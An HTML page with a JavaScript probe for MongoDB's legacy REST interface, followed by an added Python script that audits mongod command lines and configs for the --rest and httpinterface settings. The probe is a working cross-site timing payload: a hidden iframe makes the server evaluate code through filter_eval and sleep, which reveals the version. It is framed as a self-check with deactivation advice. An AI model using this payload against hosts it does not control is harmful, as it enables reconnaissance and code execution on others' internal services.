<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>MongoDB REST API timing attack</title>
</head>
<body>
<h1>MongoDB REST API timing attack</h1>
<p>Test whether MongoDB's REST API is exploitable through CSRF on your localhost or on a host in your internal network. This poses a security risk and you should deactivate it.</p>
To check IP <input value="" id="ip"> for version
<select id="version">
<option value="2">2</option>
<option value="3">3</option>
</select>
click on <button onclick="check()">check</button>
<script>
function check() {
    var target_ip = document.getElementById('ip').value;
    var version = document.getElementById('version').value;
    // The REST interface on port 28017 evaluates filter_eval server-side; sleep(2000)
    // only runs when the major version matches, so a slow iframe load is the signal.
    var url = 'http://'+target_ip+':28017/admin/$cmd/?filter_eval=function(){if(db.version().charAt(0)=='+version+'){sleep(2000)}}&limit=1';
    var first_date = new Date();
    var attack_iframe = document.createElement('iframe');
    attack_iframe.setAttribute('style', 'visibility:hidden;');
    attack_iframe.onload = function() {
        var second_date = new Date();
        var time = second_date - first_date;
        if (time > 2000) {
            alert('Possible match.\nThere might be mongodb '+version+'.x on IP '+target_ip+'\nPlease consider deactivating it, as database commands can be issued even if it\'s just a testing environment.');
        } else {
            alert('There is either no mongodb running on '+target_ip+',\nit wasn\'t started with --rest,\na different port is used\nor another problem occurred');
        }
    };
    attack_iframe.src = url;
    document.body.appendChild(attack_iframe);
}
</script>
</body>
</html>
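The page above probes a host from the outside; the matching check from the operator's side is to audit how mongod was started, since the REST interface (and the HTTP interface it rides on, port 28017 by default) is only reachable when it was explicitly enabled. The script below is an added example, not part of the original gist: it inspects a mongod command line for `--rest` / `--httpinterface` and a configuration file in either the legacy `key = value` format of MongoDB 2.x or the YAML format introduced in 2.6 (`net.http.enabled`, `net.http.RESTInterfaceEnabled`). The YAML reader is a deliberately small, dependency-free scan of the nested `key: value` layout mongod configs use, and the sample configs and command lines are constructed for this example. (The HTTP/REST interface was deprecated in 3.2 and removed in 3.6, so a current release reports nothing to find.)

```python
"""Audit a mongod launch configuration for the HTTP/REST interface (added example)."""
import re
import shlex

TRUE_VALUES = {"true", "1", "yes", "on"}
RISKY_FLAGS = ("--rest", "--httpinterface")
RISKY_YAML_KEYS = ("net.http.enabled", "net.http.RESTInterfaceEnabled")

# Constructed samples for demonstration; not taken from any real deployment.
SAMPLE_CMDLINE_EXPOSED = "mongod --dbpath /var/lib/mongo --rest"
SAMPLE_CMDLINE_SAFE = "mongod --dbpath /var/lib/mongo --port 27017"
SAMPLE_LEGACY_EXPOSED = "dbpath = /var/lib/mongo\nrest = true\n"
SAMPLE_YAML_EXPOSED = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  http:
    enabled: true
    RESTInterfaceEnabled: true   # this is what the timing probe talks to
"""
SAMPLE_YAML_SAFE = "net:\n  port: 27017\n  http:\n    enabled: false\n"


def flags_from_cmdline(cmdline):
    """Return the set of risky switches present on a mongod command line."""
    found = set()
    for arg in shlex.split(cmdline):
        name, _, value = arg.partition("=")
        # a bare switch (--rest) or an explicit true (--rest=true) both enable it
        if name in RISKY_FLAGS and (value == "" or value.lower() in TRUE_VALUES):
            found.add(name)
    return found


def _yaml_scalars(text):
    """Tiny YAML reader: yield (dotted.path, value) for nested key: value lines.
    Handles only the block-mapping layout mongod configs use (no lists, no
    flow style, no quoted colons); use PyYAML for anything more general."""
    stack = []  # (indent, key) of the enclosing mappings
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()  # drop comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, sep, value = line.strip().partition(":")
        if not sep:
            continue
        while stack and stack[-1][0] >= indent:  # leave sibling/parent scopes
            stack.pop()
        stack.append((indent, key.strip()))
        if value.strip():
            yield ".".join(k for _, k in stack), value.strip()


def audit_config(text):
    """Return [(setting, value)] for every setting that turns the interface on."""
    findings = []
    if re.search(r"^\s*[\w.]+\s*=", text, re.M):
        # legacy ini-style config (MongoDB 2.x): rest = true / httpinterface = true
        for m in re.finditer(r"^\s*(rest|httpinterface)\s*=\s*(\S+)", text, re.M | re.I):
            if m.group(2).lower() in TRUE_VALUES:
                findings.append((m.group(1).lower(), m.group(2)))
    else:
        for path, value in _yaml_scalars(text):
            if path in RISKY_YAML_KEYS and value.lower() in TRUE_VALUES:
                findings.append((path, value))
    return findings


def http_or_rest_exposed(cmdline="", config_text=""):
    """True when the command line or config enables the HTTP/REST interface.
    Mitigation: remove the flags, set both YAML keys to false, or upgrade past 3.6."""
    return bool(flags_from_cmdline(cmdline) or audit_config(config_text))


if __name__ == "__main__":
    for label, cmd, cfg in (
        ("exposed (flag)", SAMPLE_CMDLINE_EXPOSED, ""),
        ("exposed (legacy config)", SAMPLE_CMDLINE_SAFE, SAMPLE_LEGACY_EXPOSED),
        ("exposed (yaml config)", SAMPLE_CMDLINE_SAFE, SAMPLE_YAML_EXPOSED),
        ("safe", SAMPLE_CMDLINE_SAFE, SAMPLE_YAML_SAFE),
    ):
        print(label, "->", http_or_rest_exposed(cmd, cfg),
              flags_from_cmdline(cmd), audit_config(cfg))
```

Run it against the real `mongod` command line (for example from `ps -o args=` on the mongod PID) and the file passed as `--config`; any finding means the interface the timing probe relies on is switched on and should be turned off.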